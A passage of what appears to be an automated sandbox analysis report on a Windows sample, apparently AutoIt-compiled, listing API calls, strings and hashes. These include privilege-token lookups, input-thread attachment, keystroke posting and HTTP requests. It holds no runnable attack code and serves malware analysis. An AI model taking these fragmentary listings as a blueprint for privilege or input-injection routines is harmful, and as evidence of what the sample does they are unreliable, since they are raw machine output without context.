                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                Strings
                                                                                                                • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread
                                                                                                                • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                • API String ID: 2833215880-805462909
                                                                                                                • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                • GetParent.USER32 ref: 004692A4
                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                • GetParent.USER32 ref: 004692C7
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1383977212-1403004172
                                                                                                                • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                • GetParent.USER32 ref: 0046949E
                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                • GetParent.USER32 ref: 004694C1
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1383977212-1403004172
                                                                                                                • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                APIs
                                                                                                                • InterlockedIncrement.KERNEL32(00411739), ref: 00417BBA
                                                                                                                • InterlockedIncrement.KERNEL32(681574C0), ref: 00417BC7
                                                                                                                • InterlockedIncrement.KERNEL32(1015FF50), ref: 00417BD4
                                                                                                                • InterlockedIncrement.KERNEL32(CorExitProcess), ref: 00417BE1
                                                                                                                • InterlockedIncrement.KERNEL32(FF0574C0), ref: 00417BEE
                                                                                                                • InterlockedIncrement.KERNEL32(FF0574C0), ref: 00417C0A
                                                                                                                • InterlockedIncrement.KERNEL32(0048215C), ref: 00417C1A
                                                                                                                • InterlockedIncrement.KERNEL32(59FFFF4B), ref: 00417C30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IncrementInterlocked
                                                                                                                • String ID: CorExitProcess
                                                                                                                • API String ID: 3508698243-1124507085
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 312131281-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                                • SendMessageW.USER32(75FA05F0,00001001,00000000,00000000), ref: 00448E73
                                                                                                                • SendMessageW.USER32(75FA05F0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                                  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 3771399671-0
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                • String ID:
                                                                                                                • API String ID: 2156557900-0
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 0-2761332787
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 0-1603158881
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 769691225-438819550
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                Similarity
                                                                                                                • API ID: ConnectRegistry
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 76216097-2761332787
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 2948472770-2354261254
                                                                                                                • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                APIs
                                                                                                                • CreateMenu.USER32 ref: 0044863C
                                                                                                                • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                • IsMenu.USER32(?), ref: 004486EB
                                                                                                                • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                • DrawMenuBar.USER32 ref: 00448742
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 161812096-4108050209
                                                                                                                • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 00445A8D
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1290815626-3381328864
                                                                                                                • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                Similarity
                                                                                                                • API ID: CompareErrorLastString
                                                                                                                • String ID:
                                                                                                                • API String ID: 1733990998-0
                                                                                                                • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                  • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                  • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                Strings
                                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                Similarity
                                                                                                                • API ID: Variant$InitTime$ClearCopyFromSystem
                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                • API String ID: 2968790880-1568723262
                                                                                                                • Opcode ID: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                                • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                • Opcode Fuzzy Hash: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                                • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                  • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                  • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Copy$ClearInit$ErrorLast
                                                                                                                • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                • API String ID: 2268567065-60002521
                                                                                                                • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 4174999648-3243417748
                                                                                                                • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                                • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                                • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0045DB99
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0045DBA8
                                                                                                                • SHGetDesktopFolder.SHELL32(?,?), ref: 0045DC38
                                                                                                                • SHBrowseForFolderW.SHELL32 ref: 0045DCF5
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DD13
                                                                                                                • CoUninitialize.OLE32 ref: 0045DD6B
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Folder$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 2328888689-2761332787
                                                                                                                • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1291720006-3916222277
                                                                                                                • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00496789,00000104,?,00411739,?,00401C0B), ref: 0041814A
                                                                                                                • GetStdHandle.KERNEL32(000000F4,00000001,?,00000000,00000003,00000003,?,0041827E,000000FC,00418365,0048CA38,0000000C,00418422,00411739,?), ref: 0041821D
                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00411739,00000000,?,0041827E,000000FC,00418365,0048CA38,0000000C,00418422,00411739,?,?,004224D3), ref: 00418247
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: File$HandleModuleNameWrite
                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                • API String ID: 3784150691-4022980321
                                                                                                                • Opcode ID: e76ecb60561fe747eec25ea6da2aa861ca3e5a9d7f3461b9d4a94d885804126d
                                                                                                                • Instruction ID: dd0201cc8d4d8b0dfcb57b62c9b49e6d742448a59313f766a6a12cff913f25f6
                                                                                                                • Opcode Fuzzy Hash: e76ecb60561fe747eec25ea6da2aa861ca3e5a9d7f3461b9d4a94d885804126d
                                                                                                                • Instruction Fuzzy Hash: DA410AB2B0021076DA222A769D8AFFF756C9B11B54F15013FFD0591292FE6D8A8241FD
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                • IsMenu.USER32(?), ref: 0045F380
                                                                                                                • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                • String ID: 0$2
                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
